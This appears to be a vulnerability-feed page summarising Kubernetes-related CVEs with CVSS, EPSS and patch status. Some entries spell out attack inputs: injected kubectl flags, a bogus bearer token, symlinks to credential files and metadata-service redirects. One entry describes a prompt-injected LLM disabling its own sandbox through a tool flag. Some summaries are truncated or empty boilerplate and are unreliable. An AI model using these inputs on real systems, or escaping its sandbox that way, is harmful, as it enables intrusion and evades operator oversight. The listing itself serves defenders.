Race condition in pyLoad's Flask session cookie handler allows unauthenticated attackers to manipulate the SESSION_COOKIE_SECURE flag globally across all concurrent requests by spoofing the X-Forwarded-Proto header. On deployments behind a TLS-terminating proxy, this enables session cookie downgrade attacks resulting in plaintext cookie transmission; on default plain HTTP deployments, it causes session denial of service by forcing the Secure flag and breaking all concurrent user sessions. The vulnerability requires no authentication and exploits a multi-threaded race window in the Cheroot WSGI server (request_queue_size=512) combined with missing proxy origin validation (acknowledged TODO in code).

Denial Of Service Kubernetes Python
NVD GitHub
CVSS 3.1
4.8
EPSS
0.0%
CVE-2026-39884 npm HIGH PATCH GHSA This Week

Command injection in mcp-server-kubernetes port_forward function allows authenticated network attackers to expose internal Kubernetes services to external networks or bypass namespace restrictions. The vulnerability (CVSS 8.3) stems from unsafe string concatenation and space-splitting of kubectl arguments, enabling arbitrary flag injection via fields like resourceName or namespace. Attackers can inject '--address=0.0.0.0' to bind port-forwards on all network interfaces, exposing databases and internal APIs beyond localhost. Affects mcp-server-kubernetes <= 3.4.0. No public exploit identified at time of analysis, though exploitation requires only low complexity (AC:L) with authenticated access (PR:L).

RCE Kubernetes
NVD GitHub
CVSS 3.1
8.3
EPSS
0.0%
CVE-2026-40868 Go HIGH PATCH GHSA This Week

Kyverno's apiCall service helper automatically injects the controller's ServiceAccount token into HTTP requests when ClusterPolicy or GlobalContextEntry authors omit an Authorization header, enabling token exfiltration to attacker-controlled endpoints via confused deputy vulnerability. Affects deployments where policy YAML repositories are compromised (GitOps threat model) or ClusterPolicy creation is possible. CVSS 8.1 (High) reflects network attack vector with low complexity and low privileges required. No CISA KEV listing or public exploit identified at time of analysis, but GitHub advisory includes working proof-of-concept demonstrating token injection and exfiltration.

Code Injection Kubernetes Canonical
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-5483 CRITICAL PATCH Act Now

Kubernetes Service Account token disclosure in the odh-dashboard component of Red Hat OpenShift AI (RHOAI) lets an authenticated low-privileged user retrieve SA tokens via an exposed NodeJS endpoint, then reuse them to reach Kubernetes resources beyond the dashboard's intended scope. Rated CVSS 9.9 with a changed scope, the flaw effectively converts limited dashboard access into broad cluster access. There is no public exploit identified at time of analysis and EPSS is very low (0.06%), but a vendor patch is already available via Red Hat errata.

Kubernetes Red Hat Authentication Bypass Red Hat Openshift Ai 2 16 Red Hat Openshift Ai Rhoai
NVD VulDB
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-40109 Go LOW PATCH GHSA Monitor

Flux notification-controller prior to version 1.8.3 fails to validate the email claim in Google OIDC tokens used for Pub/Sub push authentication, allowing any valid Google-issued token to trigger unauthorized reconciliations via the gcr Receiver webhook endpoint. An attacker must know or discover the webhook URL (generated from a random token stored in a Kubernetes Secret) to exploit this vulnerability; however, practical impact is severely limited because Flux reconciliations are idempotent and deduplicated, meaning unauthorized requests result in no operational changes to cluster state unless the underlying Git/OCI/Helm sources have been modified.

Google Kubernetes Authentication Bypass
NVD GitHub
CVSS 3.1
3.1
EPSS
0.0%
CVE-2026-35206 Go MEDIUM PATCH GHSA This Month

Helm versions 3.20.1 and earlier, and 4.1.3 and earlier, allow local attackers with user interaction to write Chart contents to arbitrary directories via path traversal in the helm pull --untar command. A specially crafted Chart will bypass the expected subdirectory naming convention and extract files to the current working directory or a user-specified destination, potentially overwriting existing files. Vendor-released patches are available in versions 3.20.2 and 4.1.4.

Path Traversal Kubernetes Red Hat Suse
NVD GitHub VulDB
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-34487 Maven HIGH PATCH GHSA This Week

Apache Tomcat's cloud membership clustering component logs Kubernetes bearer tokens in plaintext, enabling unauthenticated remote attackers to extract authentication credentials from log files. Affects Tomcat 9.0.13-9.0.116, 10.1.0-M1-10.1.53, and 11.0.0-M1-11.0.20. CVSS 7.5 (High) reflects confidentiality impact; no public exploit identified at time of analysis. Exploitation requires network access to log files or log aggregation systems, potentially enabling privilege escalation within Kubernetes clusters.

Apache Kubernetes Tomcat Information Disclosure Red Hat +1
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-39961 Go MEDIUM PATCH GHSA This Month

Aiven Operator versions 0.31.0 through 0.36.x allow developers with ClickhouseUser CRD creation permissions in their own namespace to exfiltrate secrets from arbitrary namespaces by exploiting a confused deputy vulnerability in the operator's ClusterRole. An attacker can craft a malicious ClickhouseUser resource that causes the operator to read privileged credentials (database passwords, API keys, service tokens) from production namespaces and write them into the attacker's namespace with a single kubectl apply command. The vulnerability is fixed in version 0.37.0.

Kubernetes Privilege Escalation
NVD GitHub VulDB
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-35205 Go HIGH PATCH GHSA This Week

Helm 4.0.0 through 4.1.3 silently installs Kubernetes plugins without cryptographic provenance verification even when signature verification is explicitly required, allowing local attackers to deliver malicious plugins that execute with Helm's privileges during installation. The flaw (CWE-636: Not Failing Securely) enables supply chain attacks where unsigned or tampered plugins bypass security controls intended to validate plugin integrity. Fixed in Helm 4.1.4. EPSS score is 2nd percentile (0.01% exploitation probability), no active exploitation confirmed, SSVC assessment indicates total technical impact but non-automatable exploitation requiring user interaction.

Information Disclosure Kubernetes Helm
NVD GitHub VulDB HeroDevs
CVSS 4.0
8.4
EPSS
0.0%
CVE-2026-35204 Go HIGH PATCH GHSA This Week

Path traversal in Helm 4.0.0-4.1.3 allows local attackers to write arbitrary files during plugin installation or update by embedding '/../' sequences in the plugin.yaml version field, achieving high integrity impact across system and vulnerable component scopes. EPSS score is 2nd percentile (0.01%) with no active exploitation or public POC identified, suggesting low immediate risk despite 8.4 CVSS score. Vendor patch released in version 4.1.4.

Path Traversal Kubernetes Helm
NVD GitHub VulDB HeroDevs
CVSS 4.0
8.4
EPSS
0.0%
CVE-2025-57851 MEDIUM This Month

Container privilege escalation in Red Hat Multicluster Engine for Kubernetes allows authenticated local attackers to escalate from non-root container execution to full root privileges by exploiting group-writable permissions on the /etc/passwd file created during container image build time, enabling arbitrary UID assignment including UID 0.

Privilege Escalation Kubernetes
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-34045 CRITICAL PATCH Act Now

Denial-of-service and information disclosure in Podman Desktop prior to 1.26.2 stem from an unauthenticated HTTP server that any network attacker can reach without credentials or user interaction. By abusing missing connection limits and timeouts, an attacker exhausts file descriptors and kernel memory to crash the application or freeze the entire host, while verbose error responses leak internal filesystem paths and system details (including Windows usernames). SSVC marks exploitation as proof-of-concept and automatable; publicly available exploit code exists, but EPSS probability is low (0.06%, 19th percentile).

Kubernetes Information Disclosure Microsoft Podman Desktop
NVD GitHub VulDB
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-4740 Go HIGH PATCH GHSA This Week

Improper certificate validation in Red Hat's Open Cluster Management (OCM) and Multicluster Engine for Kubernetes allows managed cluster administrators with high-level local access to forge client certificates, achieving cross-cluster privilege escalation to other managed clusters including the hub cluster. The CVSS 8.2 rating reflects high impact across confidentiality, integrity, and availability with scope change, though exploitation requires existing high-privilege local access (PR:H) and local attack vector (AV:L). No public exploit code or CISA KEV listing identified at time of analysis, though technical details are publicly documented in researcher blog post.

Privilege Escalation Red Hat Kubernetes Multicluster Engine For Kubernetes
NVD
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-35043 PyPI HIGH PATCH GHSA This Week

Command injection in BentoML's cloud deployment path allows remote code execution on BentoCloud build infrastructure via malicious bentofile.yaml configurations. While commit ce53491 fixed command injection in local Dockerfile generation by adding shlex.quote protection, the cloud deployment code path (deployment.py:1648) remained vulnerable, directly interpolating system_packages into shell commands without sanitization. Attackers can inject shell metacharacters through bentofile.yaml to execut

RCE Command Injection Docker Ubuntu Kubernetes
NVD GitHub VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-33105 CRITICAL PATCH NO ACTION HOSTED Monitor

Microsoft Azure Kubernetes Service (AKS) contains an improper authorization vulnerability enabling unauthenticated remote attackers to elevate privileges over a network with critical impact across confidentiality, integrity, and availability. The CVSS 10.0 critical rating reflects network-accessible exploitation requiring no authentication, low complexity, and scope change allowing compromise beyond the vulnerable component. No public exploit identified at time of analysis, though the authentication bypass nature and maximum severity warrant immediate priority.

Microsoft Kubernetes Authentication Bypass
NVD VulDB
CVSS 3.1
10.0
EPSS
0.1%
CVE-2026-34976 Go CRITICAL PATCH GHSA Act Now

Unauthenticated remote attackers can trigger complete database overwrites, server-side file reads, and SSRF attacks against Dgraph graph database servers (v24.x, v25.x prior to v25.3.1) via the admin API's restoreTenant mutation. The mutation bypasses all authentication middleware due to missing authorization configuration, allowing attackers to provide arbitrary backup source URLs (including file:// schemes for local filesystem access), S3/MinIO credentials, Vault configuration paths, and encry

Authentication Bypass SSRF Hashicorp Docker Kubernetes
NVD GitHub VulDB
CVSS 3.1
10.0
EPSS
0.0%
CVE-2026-34940 Go HIGH PATCH GHSA This Week

Command injection in KubeAI Ollama model controller allows Kubernetes users with Model CRD write permissions to execute arbitrary shell commands inside model server pods. The vulnerability stems from unsanitized URL components (model ref and query parameters) being interpolated into bash startup probe scripts. With CVSS 8.7 (AV:N/AC:L/PR:H/UI:N/S:C), this represents a significant privilege escalation risk in multi-tenant clusters where Model creation is delegated to non-admin users. No public exploit identified at time of analysis, though detailed proof-of-concept payloads are documented in the GitHub advisory.

Kubernetes Command Injection
NVD GitHub
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-34936 PyPI HIGH PATCH GHSA This Week

Server-Side Request Forgery in PraisonAI's passthrough API allows authenticated remote attackers to access internal cloud metadata services and private network resources. The vulnerability affects the praisonai Python package where the passthrough() and apassthrough() functions accept unvalidated caller-controlled api_base parameters that are directly concatenated and passed to httpx requests. With default AUTH_ENABLED=False configuration, this is remotely exploitable to retrieve EC2 IAM credent

SSRF Elastic Redis Kubernetes Python
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-34070 PyPI HIGH PATCH GHSA This Week

A path traversal vulnerability (CVSS 7.5). High severity vulnerability requiring prompt remediation. Vendor patch is available.

Python Path Traversal Docker Kubernetes Microsoft
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.2%
CVE-2026-32241 Go HIGH PATCH GHSA This Week

Command injection in Flannel's experimental Extension backend allows authenticated Kubernetes users with node annotation privileges to execute arbitrary commands as root on all flannel nodes in the cluster. This affects Flannel versions prior to 0.28.2 using the Extension backend; other backends (vxlan, wireguard) are unaffected. No public exploit identified at time of analysis, but CVSS 7.5 reflects high impact once node annotation access is achieved. EPSS data not available for this recent CVE (2026 designation appears to be error; actual 2025 advisory).

Kubernetes Command Injection Suse
NVD GitHub
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-33726 Go MEDIUM PATCH This Month

Cilium Network Policy enforcement is bypassed for traffic from pods to L7 Services with local backends on the same node when Per-Endpoint Routing is enabled and BPF Host Routing is disabled, allowing authenticated local attackers to circumvent ingress network policies and access restricted services. This affects Cilium v1.19.0-v1.19.1, v1.18.0-v1.18.7, and all versions prior to v1.17.13, with the most common vulnerable deployment being Amazon EKS with Cilium ENI mode. Vendor-released patches are available (v1.19.2, v1.18.8, v1.17.14), and no public exploit code has been identified at the time of analysis.

Microsoft Kubernetes Authentication Bypass Suse
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-33285 npm HIGH PATCH GHSA This Week

LiquidJS versions 10.24.x and earlier contain a memory limit bypass vulnerability that allows unauthenticated attackers to crash Node.js processes through a single malicious template. By exploiting reverse range expressions to drive the memory counter negative, attackers can allocate unlimited memory and trigger a V8 Fatal error that terminates the entire process, causing complete denial of service. A detailed proof-of-concept exploit is publicly available demonstrating the full attack chain from bypass to process crash.

Node.js Denial Of Service Kubernetes Docker
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-28809 MEDIUM This Month

A SSRF vulnerability (CVSS 6.3) that allows an attacker. Remediation should follow standard vulnerability management procedures.

XXE SSRF Kubernetes
NVD GitHub VulDB
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-3864 Go MEDIUM PATCH This Month

The Kubernetes NFS CSI Driver fails to properly validate the subDir parameter in volume identifiers, allowing privileged users to inject path traversal sequences that bypass intended directory restrictions. Attackers with PersistentVolume creation privileges can craft malicious volume identifiers to access and modify arbitrary directories on the NFS server during cleanup operations. No patch is currently available for this medium-severity vulnerability affecting Kubernetes environments.

Kubernetes Path Traversal Suse
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-33413 Go HIGH PATCH This Week

This is an authentication and authorization bypass vulnerability in etcd's gRPC API layer that allows unauthorized users to execute privileged operations when etcd auth is enabled. Affected are etcd versions prior to 3.4.42, 3.5.28, and 3.6.9 (specifically the Go packages go.etcd.io/etcd/v3 and go.etcd.io/etcd). Attackers can enumerate cluster topology via MemberList, trigger denial of service through Alarm APIs, manipulate Lease operations affecting TTL-based keys, and force compaction to permanently delete historical data. Standard Kubernetes deployments are not affected as they do not rely on etcd's built-in authentication. No EPSS score or KEV listing is currently available, and the vulnerability was responsibly disclosed by multiple security researchers.

Kubernetes Denial Of Service Authentication Bypass Red Hat Suse
NVD GitHub VulDB
CVSS 4.0
8.8
EPSS
0.0%
CVE-2026-33343 Go MEDIUM PATCH This Month

An authenticated user with restricted RBAC permissions on specific key ranges in etcd can use nested transactions to completely bypass key-level authorization controls and access the entire etcd data store. This affects etcd versions 3.4.x before 3.4.42, 3.5.x before 3.5.28, and 3.6.x before 3.6.9. While Kubernetes deployments are typically protected because Kubernetes handles authentication and authorization at the API server layer rather than relying on etcd's built-in controls, direct etcd deployments with RBAC restrictions are at significant risk.

Kubernetes Authentication Bypass Red Hat Suse
NVD GitHub VulDB
CVSS 3.1
5.9
EPSS
1.0%
CVE-2026-33344 Go HIGH PATCH This Week

Path traversal in Apple and Kubernetes DAG management APIs allows authenticated attackers to access arbitrary files outside the intended directory by injecting URL-encoded forward slashes into file name parameters on GET, DELETE, RENAME, and EXECUTE endpoints. The vulnerability affects systems where a previous patch (CVE-2026-27598) only secured the CREATE endpoint while leaving other API functions unprotected. An attacker with valid credentials can read, modify, or execute unintended DAG files on the affected system.

Path Traversal Apple Kubernetes macOS Suse
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
3.0%
CVE-2026-33226 npm HIGH This Week

Budibase, a low-code platform distributed as a Docker/Kubernetes application, contains a Server-Side Request Forgery (SSRF) vulnerability in its REST datasource query preview endpoint. Authenticated admin users can force the server to make HTTP requests to arbitrary URLs including cloud metadata services, internal networks, and Kubernetes APIs. A detailed proof-of-concept exists demonstrating theft of GCP OAuth2 tokens with cloud-platform scope, CouchDB credential extraction, and internal service enumeration. The CVSS score of 8.7 reflects high confidentiality and integrity impact with changed scope, requiring high privileges but low attack complexity.

Microsoft Redis Google SSRF Docker +1
NVD GitHub VulDB
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-33211 Go CRITICAL PATCH Act Now

The Tekton Pipelines git resolver contains a path traversal vulnerability allowing authenticated tenants to read arbitrary files from the resolver pod's filesystem via the pathInRepo parameter. Affected products include github.com/tektoncd/pipeline versions 1.0.0 through 1.10.0 across multiple release branches. The vulnerability enables credential exfiltration and privilege escalation from namespace-scoped access to cluster-wide secret reading capabilities. A proof-of-concept was provided by the vulnerability reporter Oleh Konko.

Path Traversal Privilege Escalation Kubernetes
NVD GitHub VulDB
CVSS 3.1
9.6
EPSS
0.0%
CVE-2026-33022 Go MEDIUM PATCH This Month

A denial of service vulnerability (CVSS 6.5). Remediation should follow standard vulnerability management procedures.

Denial Of Service Kubernetes Red Hat Suse
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-32254 Go HIGH PATCH This Week

The kube-router proxy module fails to validate Service externalIPs and LoadBalancer IPs against configured IP ranges, allowing namespace-scoped users to bind arbitrary VIPs on all cluster nodes and hijack traffic to critical services like kube-dns. This affects all kube-router v2.x versions including v2.7.1, primarily impacting multi-tenant clusters where untrusted users have Service creation permissions. A detailed proof-of-concept demonstrates single-command cluster DNS takedown and arbitrary VIP binding with traffic redirection to attacker-controlled pods, though EPSS scoring is not available for this recently disclosed vulnerability.

Kubernetes Denial Of Service Authentication Bypass Nginx Suse
NVD GitHub VulDB
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-32769 Go HIGH PATCH GHSA This Week

CVE-2026-32769 is a security vulnerability. Remediation should follow standard vulnerability management procedures. Vendor patch is available.

Kubernetes Authentication Bypass Suse
NVD GitHub VulDB
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-32768 Go HIGH PATCH This Week

CVE-2026-32768 is a security vulnerability. Remediation should follow standard vulnerability management procedures. Vendor patch is available.

Kubernetes Authentication Bypass Suse
NVD GitHub VulDB
CVSS 4.0
7.9
EPSS
0.0%
CVE-2026-32720 Go HIGH POC PATCH This Week

A misconfigured NetworkPolicy in Kubernetes deployments allows attackers to perform unauthorized lateral movement between namespaces, breaking namespace isolation security boundaries. This vulnerability affects Kubernetes environments with improperly configured inter-namespace NetworkPolicies, specifically those with 'inter-ns' prefixed policies in monitoring namespaces. An attacker who compromises any component can pivot to access resources in other namespaces, potentially accessing sensitive data or systems they shouldn't have access to.

Kubernetes Authentication Bypass Suse
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-32598 npm MEDIUM PATCH This Month

OneUptime versions prior to 10.0.24 contain a sensitive information exposure vulnerability where the password reset flow logs complete password reset URLs containing plaintext reset tokens at the INFO log level, which is enabled by default in production environments. Any actor with access to application logs-including log aggregation systems, Docker logs, or Kubernetes pod logs-can extract these tokens and perform account takeover on any user. The vulnerability is fixed in version 10.0.24.

Kubernetes Docker Information Disclosure Oneuptime
NVD GitHub VulDB
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-31890 MEDIUM This Month

Silent event loss in Inspektor Gadget prior to 0.50.1 allows local attackers to cause denial of service by filling the 256KB ring-buffer, which triggers undetected data drops without alerting users or administrators. When the buffer becomes full, gadgets silently discard events and fail to report the loss count, potentially hiding critical system events from Kubernetes cluster and Linux host monitoring. A local attacker with limited privileges can exploit this to obscure malicious activity or system anomalies by saturating the instrumentation buffer.

Linux Kubernetes Denial Of Service Suse
NVD GitHub VulDB
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-2808 Go MEDIUM PATCH This Month

Medium severity vulnerability in HashiCorp Consul. HashiCorp Consul and Consul Enterprise 1.18.20 up to 1.21.10 and 1.22.4 are vulnerable to arbitrary file read when configured with Kubernetes authentication. This vulnerability, CVE-2026-2808, is fixed in Consul 1.18.21, 1.21.11 and 1.22.5.

Kubernetes Information Disclosure Red Hat Suse
NVD VulDB
CVSS 3.1
6.8
EPSS
0.1%
CVE-2026-31866 Go HIGH PATCH This Week

Kubernetes flagd feature flag daemon versions before 0.14.2 are vulnerable to denial of service through unbounded memory allocation on publicly accessible evaluation endpoints. An unauthenticated attacker can send HTTP requests with arbitrarily large payloads to exhaust memory and crash the service. This affects deployments without external authentication controls, allowing trivial process termination in containerized environments.

Kubernetes Denial Of Service Suse
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-31892 Go HIGH POC PATCH This Week

Authorization bypass in Argo Workflows (2.9.0 through 4.0.1 and 3.7.x before 3.7.11) lets any user permitted to submit Workflows override admin-defined WorkflowTemplate security controls by attaching a podSpecPatch to their submission. Because podSpecPatch is merged with Workflow-spec precedence and applied to the pod with no security validation, even controllers locked down with templateReferencing: Strict can be circumvented to run arbitrary pod settings such as privileged: true. Publicly available exploit code exists, but EPSS is low (0.04%) and it is not in CISA KEV.

Kubernetes Authentication Bypass Argo Workflows
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.0%
CVE-2026-28229 Go HIGH POC PATCH This Week

Information disclosure in Argo Workflows before 4.0.2 and 3.7.11 lets any unauthenticated client read WorkflowTemplates and ClusterWorkflowTemplates by sending a bogus 'Authorization: Bearer nothing' token, leaking embedded Secret manifests and other sensitive template content. The CVSS 3.1 base score is 7.5 (confidentiality-only, network, no privileges) and publicly available exploit code exists, though EPSS is very low (0.04%) and it is not in CISA KEV, indicating no confirmed widespread exploitation yet.

Kubernetes Authentication Bypass Argo Workflows
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-29773 Go MEDIUM PATCH This Month

Kubewarden's deprecated host-callback APIs in AdmissionPolicy can be exploited by authenticated users with policy creation permissions to gain unauthorized read access to cluster-level resources including Ingresses, Namespaces, and Services. An attacker with privileged AdmissionPolicy creation permissions—not a default privilege—could craft malicious policies to bypass intended access controls and enumerate sensitive cluster infrastructure, though this vulnerability is limited to read-only access without write capability or access to Secrets and ConfigMaps. The vulnerability affects Kubernetes deployments using Kubewarden and currently has no available patch.

Kubernetes Privilege Escalation Authentication Bypass
NVD GitHub VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-3288 HIGH POC This Week

Arbitrary code execution in ingress-nginx controllers via malicious rewrite-target annotations allows authenticated attackers to execute commands and exfiltrate cluster secrets. Kubernetes administrators using ingress-nginx are at risk, particularly in default configurations where the controller has cluster-wide secret access. No patch is currently available.

Nginx Kubernetes RCE
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-29064 Go HIGH POC PATCH This Week

Zarf is an Airgap Native Packager Manager for Kubernetes. [CVSS 8.2 HIGH]

Kubernetes Path Traversal Zarf Suse
NVD GitHub
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-25750 HIGH This Week

LangSmith Studio contains a URL parameter injection vulnerability that allows attackers to steal authentication tokens, user IDs, and workspace credentials from users who click malicious links, enabling account takeover and unauthorized access to workspace resources. Both LangSmith Cloud and self-hosted Kubernetes deployments are affected, with exploitation requiring social engineering to trick authenticated users into clicking attacker-controlled URLs. No patch is currently available for this high-severity vulnerability (CVSS 8.1).

Kubernetes Authentication Bypass Langsmith Langchain AI / ML
NVD GitHub VulDB
CVSS 3.1
8.1
EPSS
0.1%
CVE-2026-28406 Go HIGH PATCH This Week

Path traversal in Kaniko 1.25.4 through 1.25.9 allows attackers to extract tar archives outside the intended destination directory, enabling arbitrary file writes on the build system. When combined with Docker credential helpers in registry authentication scenarios, this vulnerability can be leveraged for code execution within the Kaniko executor process. Docker and Kubernetes environments using the affected Kaniko versions are at risk.

Docker Kubernetes Kaniko RCE Path Traversal
NVD GitHub
CVSS 3.1
8.2
EPSS
0.1%
CVE-2026-24005 Go NONE POC PATCH Awaiting Data

Kruise provides automated management of large-scale applications on Kubernetes. Prior to versions 1.8.3 and 1.7.5, PodProbeMarker allows defining custom probes with TCPSocket or HTTPGet handlers.

Kubernetes SSRF
NVD GitHub
EPSS
0.0%
CVE-2026-27211 CRITICAL PATCH Act Now

Arbitrary host file exfiltration from Cloud Hypervisor VMM versions 34.0-50.0. CVSS 10.0. Patch available.

KVM Linux Information Disclosure Path Traversal Docker +2
NVD GitHub
CVSS 3.1
10.0
EPSS
0.0%
CVE-2026-27134 HIGH This Week

Strimzi Kafka Operator versions 0.49.0-0.50.0 incorrectly trusts all intermediate CAs in a multistage certificate chain for mTLS authentication, allowing any user with a certificate signed by any CA in the chain to authenticate to Kafka listeners. This authentication bypass affects only deployments using custom Cluster or Clients CA with multi-level CA chains. No patch is currently available.

Apache Kubernetes Strimzi Kafka Operator Authentication Bypass
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-27133 MEDIUM This Month

Strimzi versions 0.47.0 through 0.50.0 improperly trust all certificates in a CA chain rather than only the intended signing authority, allowing Kafka Connect and MirrorMaker 2 operands to accept connections from brokers with certificates signed by intermediate CAs. An attacker could leverage this improper certificate validation to establish unauthorized connections to Kafka clusters using alternate CA-signed certificates from the trusted chain. This vulnerability requires high privileges to configure the CA chain and has no available patch at this time.

Apache Kubernetes Strimzi Red Hat
NVD GitHub
CVSS 3.1
5.9
EPSS
0.0%
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Open WebUI versions ≤0.9.4 allow authenticated users to bypass SSRF protections and read internal network resources via HTTP redirect-following. The vulnerability exists in five distinct code paths: web-fetch retrieval, image-loading endpoints, chat-completion image inlining, and OAuth/tool-server execution flows. Any authenticated user can submit a public URL that 302-redirects to internal addresses (127.0.0.1, 169.254.169.254 cloud metadata, RFC1918 private networks) and receive the response body. The vendor confirms active exploitation in the wild was NOT observed, but publicly available exploit code exists (PoC in advisory) and EPSS score of 0.00043 (4.3%) suggests low automated scanning targeting at time of analysis. Fixed in version 0.9.5 released March 2025.

Kubernetes SSRF
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Kuma Control Plane with default configuration leaks admin bootstrap tokens and signing keys to any website an operator visits if the control plane is reachable from their browser. The vulnerability combines default CORS settings allowing all origins (CorsAllowedDomains: [".*"]) with LocalhostIsAdmin: true, which grants admin privileges to any request from 127.0.0.1 without validating whether it originates from a trusted same-origin context. An attacker's JavaScript on a visited webpage can cross-origin fetch the admin token and cryptographic material via browser requests to localhost:5681. This is not actively exploited in the wild but represents a realistic threat in developer and testing environments where control planes run on workstations with web browsers.

Kubernetes Docker Information Disclosure
NVD GitHub VulDB
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Token leakage in Portainer's authentication middleware allows JWT bearer tokens passed via the `?token=<JWT>` URL query parameter to be harvested from reverse-proxy access logs, browser history, and HTTP Referer headers, enabling account takeover for the validity window of the token (default 8 hours). The flaw affected any user with container exec/attach rights - not just administrators - and a leaked admin token grants full control of Portainer and every managed Docker/Kubernetes environment. No public exploit identified at time of analysis, though the underlying behavior was present since JWT auth was introduced and the GitHub Security Advisory provides sufficient detail to weaponize.

Kubernetes Docker Information Disclosure +1
NVD GitHub
EPSS 0% CVSS 8.1
HIGH PATCH This Week

Authorization bypass in Portainer 2.33.0 through 2.33.7 allows authenticated users to access Kubernetes cluster resources beyond their assigned permissions due to missing return statement in middleware error handling. Any user with a valid Portainer session can exploit this to read or modify Kubernetes secrets, pods, deployments, and other resources on endpoints they should not access. The flaw affects both Community Edition and Enterprise Edition. Fixed in version 2.33.8 and inherently absent from 2.39.0+. No public exploit code identified at time of analysis, though the single-line code fix and detailed GitHub advisory make reproduction straightforward for authenticated attackers.

Authentication Bypass Kubernetes
NVD GitHub
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Arbitrary file read in Portainer Community Edition allows authenticated low-privileged users to exfiltrate any file readable by the Portainer process — commonly root — by submitting a Git-backed stack whose docker-compose.yml is a symlink to a target like /etc/shadow or a Kubernetes service account token. The flaw stems from go-git v5 materializing Git symlink blobs as real OS symlinks during checkout combined with GetFileContent reading the entry point through os.ReadFile without resolving links, and is amplified by Portainer's scheduled stack auto-update, which lets a previously benign repository turn malicious after initial review. A fully validated proof-of-concept exists from the reporter (b-hermes), but there is no public exploit identified at time of analysis and no CISA KEV listing.

Kubernetes Docker RCE
NVD GitHub
EPSS 0% CVSS 9.0
CRITICAL PATCH Act Now

Stored Cross-Site Scripting (XSS) in vCluster Platform allows authenticated attackers with namespace creation privileges to inject malicious scripts via the templateRef name field, potentially escalating to Global-Admin access. The vulnerability affects versions prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0. With a CVSS score of 9.0 and changed scope (S:C), this represents a critical privilege escalation path in Kubernetes multi-tenancy environments. No active exploitation confirmed by CISA KEV at time of analysis, but the low attack complexity (AC:L) and clear attack path make this an immediate patching priority for organizations running vCluster Platform.

Kubernetes XSS
NVD GitHub VulDB
EPSS 0% CVSS 6.4
MEDIUM PATCH This Month

Unauthorized write access to Traefik's live dynamic configuration is achievable by a low-privileged Kubernetes tenant in shared Gateway deployments, because the Gateway API provider's `isInternalService()` check accepts any `TraefikService` name ending in `@internal` - not exclusively the intended `api@internal`. This allows a tenant with `HTTPRoute` creation rights to route external traffic to `rest@internal`, fully bypassing the `providers.rest.insecure=false` safeguard and gaining `PUT /api/providers/rest` write access. No active exploitation is confirmed (not in CISA KEV, EPSS at 0.01%), but a detailed proof-of-concept is published in the GHSA advisory and the SSVC framework marks the attack as automatable for tenants meeting the prerequisites.

Denial Of Service Authentication Bypass Kubernetes
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Sandbox escape in OpenClaude (npm package openclaude) versions before 0.5.1 allows a prompt-injected LLM to disable host sandboxing by setting the model-controlled `dangerouslyDisableSandbox: true` flag in any Bash tool_use call, yielding full unsandboxed command execution on the host. CVSS 4.0 scores this 9.3 Critical (AV:N/AC:L/PR:N/UI:N, VC/VI/VA:H); no public exploit identified at time of analysis beyond the reporter's PoC, but the upstream fix has been merged. The flaw is especially severe because it is reachable under default settings (`allowUnsandboxedCommands` defaults to true).

Kubernetes Information Disclosure Authentication Bypass +4
NVD GitHub
EPSS 0% 4.9 CVSS 9.6
CRITICAL POC KEV PATCH THREAT Act Now

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actions exploitation. Attackers combined pull_request_target misconfiguration, Actions cache poisoning, and OIDC token memory extraction to publish malicious code under the legitimate TanStack identity. Installing any affected version executes a 2.3 MB obfuscated payload that exfiltrates AWS/GCP/Kubernetes credentials, npm tokens, GitHub secrets, SSH keys, and HashiCorp Vault tokens over encrypted Session/Oxen messenger infrastructure. The payload propagates by republishing victim-maintained packages with identical injection. Socket.dev and the TanStack team confirmed the incident via GHSA-g7cv-rxg3-hmpx. No EPSS or CISA KEV data available for this recent supply-chain attack. CVSS 9.6 reflects the cross-scope credential theft impact (S:C/C:H/I:H), though exploitation requires user-initiated package installation (UI:R).

Kubernetes Node.js Hashicorp +1
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH PATCH This Week

